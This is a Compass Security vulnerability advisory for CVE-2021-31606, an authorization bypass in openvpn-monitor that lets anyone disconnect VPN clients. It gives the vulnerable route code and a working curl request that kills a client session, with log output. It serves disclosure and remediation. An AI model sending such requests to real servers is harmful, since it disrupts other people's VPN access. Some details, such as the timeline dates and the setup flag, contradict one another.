Headline
CVE-2021-31606: OpenVPN Monitor 1.1.3 Authorization Bypass
furlongm openvpn-monitor through 1.1.3 allows Authorization Bypass to disconnect arbitrary clients.
#############################################################
COMPASS SECURITY ADVISORY
https://www.compass-security.com/research/advisories/
#############################################################
Product: openvpn-monitor
Vendor: https://github.com/furlongm/openvpn-monitor
CSNC ID: CSNC-2021-009
CVE ID: CVE-2021-31606
Subject: Authorization Bypass
Severity: Medium
Effect: Denial of Service
Author: Emanuel Duss [email protected]
Sylvain Heiniger [email protected]
Date: 2021-09-22
#############################################################
Introduction
openvpn-monitor is a simple Python program to generate HTML that displays the
status of an OpenVPN server, including all current connections. It uses the
OpenVPN management console. It typically runs on the same host as the OpenVPN
server. [0][1]
During a customer project, several security vulnerabilities were discovered in
this software.
This advisory describes an authorization bypass which allows an attacker to
disconnect arbitrary clients, even if the disconnect feature is disabled.
Affected
- Vulnerable: openvpn-monitor <= 1.1.3
- Not vulnerable: none
The vulnerability is already fixed in the source code [3], but there is no new
release which contains the fix. Therefore, all currently available releases
contain this vulnerability.
Technical Description
Starting the openvpn-monitor application without the
OPENVPNMONITOR_SITES_0_SHOWDISCONNECT=True option in order to disable the
disconnect functionality:
# docker run --rm --name openvpn-monitor --net host \
-e OPENVPNMONITOR_DEFAULT_DATETIMEFORMAT="%%H:%%M:%%S %%d/%%m/%%Y" \
-e OPENVPNMONITOR_DEFAULT_LATITUDE=-37 \
-e OPENVPNMONITOR_DEFAULT_LOGO=logo.jpg \
-e OPENVPNMONITOR_DEFAULT_LONGITUDE=144 \
-e OPENVPNMONITOR_DEFAULT_MAPS=True \
-e OPENVPNMONITOR_DEFAULT_SITE=Test \
-e OPENVPNMONITOR_SITES_0_ALIAS=UDP \
-e OPENVPNMONITOR_SITES_0_HOST=127.0.0.1 \
-e OPENVPNMONITOR_SITES_0_NAME=UDP \
-e OPENVPNMONITOR_SITES_0_PORT=5555 \
-e OPENVPNMONITOR_SITES_0_SHOWDISCONNECT=True \
-p 80:80 ruimarinho/openvpn-monitor
When the openvpn-monitor application is accessed, the disconnect button is not
displayed (as expected).
However, there is no authorization check implemented which check if the
functionality is allowed to be used or not:
[CUT BY COMPASS]
@app.route('/', method='POST')
def post_slash():
vpn_id = request.forms.get('vpn_id')
ip = request.forms.get('ip')
port = request.forms.get('port')
client_id = request.forms.get('client_id')
return render(vpn_id=vpn_id, ip=ip, port=port, client_id=client_id)
[CUT BY COMPASS]
An attacker can use this to disconnect arbitrary clients:
$ curl http://openvpn-monitor.example.net -d "vpn_id=UDP&ip=10.5.23.42&port=1194&client_id=5"
The client will be disconnected. This can be seen in the OpenVPN server log:
[CUT BY COMPASS]
2021-04-21 11:33:22 MANAGEMENT: Client connected from [AF_INET][undef]:5555
2021-04-21 11:33:22 MANAGEMENT: CMD 'version'
2021-04-21 11:33:22 MANAGEMENT: CMD 'client-kill 5'
2021-04-21 11:33:22 MANAGEMENT: CMD 'quit'
2021-04-21 11:33:22 MANAGEMENT: Client disconnected
2021-04-21 11:33:22 MANAGEMENT: Client connected from [AF_INET][undef]:5555
2021-04-21 11:33:22 MANAGEMENT: CMD 'version'
2021-04-21 11:33:22 MANAGEMENT: CMD 'state'
2021-04-21 11:33:22 MANAGEMENT: CMD 'status 3'
2021-04-21 11:33:22 MANAGEMENT: CMD 'quit'
2021-04-21 11:33:22 MANAGEMENT: Client disconnected
[CUT BY COMPASS]
Vulnerability Classification
CVSS v3.1 Metrics [4]:
- CVSS Base Score: 5.8
- CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L
Workaround / Fix
openvpn-monitor Vendor
Authorization checks should be implemented so that this functionality can only
be used if OPENVPNMONITOR_SITES_0_SHOWDISCONNECT=True is enabled. This has to
be enforced on the server and not on the client.
openvpn-monitor Users
Users of the openvpn-monitor should either apply the patch which is available
on GitHub [2] or use the latest version from the source code repository [1].
Timeline
2021-05-05: Vulnerability discovered
2021-04-20: Requested CVE ID @ MITRE
2021-04-20: Contacted vendor
2021-04-22: Sent details via email to vendor
2021-04-24: Vendor confirmed and already started to work on a fix
2021-09-08: Asked vendor for updates
2021-09-08: Vendor told it’s OK to publish the advisory
2021-09-22: Public disclosure
References
[0] http://openvpn-monitor.openbytes.ie/
[1] https://github.com/furlongm/openvpn-monitor
[2] https://github.com/furlongm/openvpn-monitor/commit/ddb9d31ef0ec56f578bdacf99ebe9d68455ed8ca
[3] https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L&version=3.1